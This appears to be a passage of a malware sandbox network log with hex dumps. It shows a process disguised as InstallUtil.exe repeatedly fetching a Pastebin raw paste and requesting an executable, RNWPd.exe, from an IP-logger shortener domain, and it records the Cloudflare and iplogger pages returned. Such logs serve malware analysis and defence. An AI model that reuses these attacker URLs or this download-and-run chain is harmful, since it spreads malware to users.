                          2024-09-12 20:01:35 UTC1369INData Raw: 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c
                          Data Ascii: tLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url
                          2024-09-12 20:01:35 UTC1369INData Raw: 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 20 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28
                          Data Ascii: le}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (
                          2024-09-12 20:01:35 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 20 61 7b 63
                          Data Ascii: allenge-error-text{background-position:100%;padding-left:0;padding-right:34px}.challenge-content .spacer{margin:2rem 0}.challenge-content .loading-spinner{height:76.391px}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body a{c
                          2024-09-12 20:01:35 UTC1369INData Raw: 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e
                          Data Ascii: S4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}</style><meta http-equiv="refresh" conten
                          2024-09-12 20:01:35 UTC1369INData Raw: 35 4a 62 44 77 51 52 58 6a 50 5f 2e 53 6e 72 36 4c 52 31 38 52 68 4a 4e 30 53 45 73 69 31 65 49 45 35 32 49 32 66 4a 50 46 42 4d 44 48 55 32 35 4c 37 6b 47 4d 61 41 36 36 42 4b 6d 56 6c 68 48 6d 44 57 30 44 48 76 7a 73 49 71 5f 77 33 46 4a 55 65 6a 63 64 33 53 73 4d 78 5f 65 52 49 73 4c 68 30 51 35 30 68 69 48 7a 59 46 79 45 7a 50 68 52 66 6f 36 72 46 71 4c 4a 6c 73 79 76 59 49 6a 73 58 78 75 6b 6e 72 49 6e 38 6d 4b 42 56 6f 6d 43 33 43 61 64 71 76 56 68 4a 53 7a 51 6e 44 6c 36 68 65 5f 72 43 37 6b 47 2e 54 4e 31 6d 5a 6d 50 37 65 32 56 6d 56 33 64 68 61 2e 63 48 6b 66 72 46 6e 6d 4d 5a 4c 4e 39 6d 4a 49 4b 44 45 7a 54 4a 52 4e 48 6e 45 6e 42 52 5a 77 75 7a 6b 71 4b 61 32 6a 70 57 49 30 4e 35 6e 53 5f 52 58 6c 34 75 4d 52 47 44 53 6b 72 43 53 51 71 61 41
                          Data Ascii: 5JbDwQRXjP_.Snr6LR18RhJN0SEsi1eIE52I2fJPFBMDHU25L7kGMaA66BKmVlhHmDW0DHvzsIq_w3FJUejcd3SsMx_eRIsLh0Q50hiHzYFyEzPhRfo6rFqLJlsyvYIjsXxuknrIn8mKBVomC3CadqvVhJSzQnDl6he_rC7kG.TN1mZmP7e2VmV3dha.cHkfrFnmMZLN9mJIKDEzTJRNHnEnBRZwuzkqKa2jpWI0N5nS_RXl4uMRGDSkrCSQqaA


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.849722172.67.19.244436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:36 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-09-12 20:01:36 UTC222INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Server: cloudflare
                          CF-RAY: 8c227d8c7a2e4294-EWR
                          2024-09-12 20:01:36 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2024-09-12 20:01:36 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                          Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                          2024-09-12 20:01:36 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                          Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                          2024-09-12 20:01:36 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                          Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                          2024-09-12 20:01:36 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.849723188.114.96.34436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:37 UTC65OUTGET /RNWPd.exe HTTP/1.1
                          Host: yip.su
                          Connection: Keep-Alive
                          2024-09-12 20:01:37 UTC900INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          memory: 0.36197662353515625
                          expires: Thu, 12 Sep 2024 20:01:37 +0000
                          strict-transport-security: max-age=604800
                          strict-transport-security: max-age=31536000
                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                          x-frame-options: SAMEORIGIN
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Last-Modified: Thu, 12 Sep 2024 20:01:37 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lCIJkL2pWtzY8Lxy7VKEiVEXoJ54VNH%2F4XxlXS3Gi7GLdqZE3dDNjtiMHHU2Va1ntdXFggyNAhla0agrXTGwi%2B2eM22%2F862d0uNpjplwxPYRHdCpMkA96ds%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c227d925b046a5c-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-09-12 20:01:37 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                          Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                          2024-09-12 20:01:37 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                          Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                          2024-09-12 20:01:37 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                          Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                          2024-09-12 20:01:37 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                          Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                          2024-09-12 20:01:37 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                          Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                          2024-09-12 20:01:37 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                          Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                          2024-09-12 20:01:37 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                          2024-09-12 20:01:37 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.849724172.67.19.244436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:01:42 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-09-12 20:01:42 UTC222INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:01:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Server: cloudflare
                          CF-RAY: 8c227db35edd80cd-EWR
                          2024-09-12 20:01:42 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2024-09-12 20:01:42 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
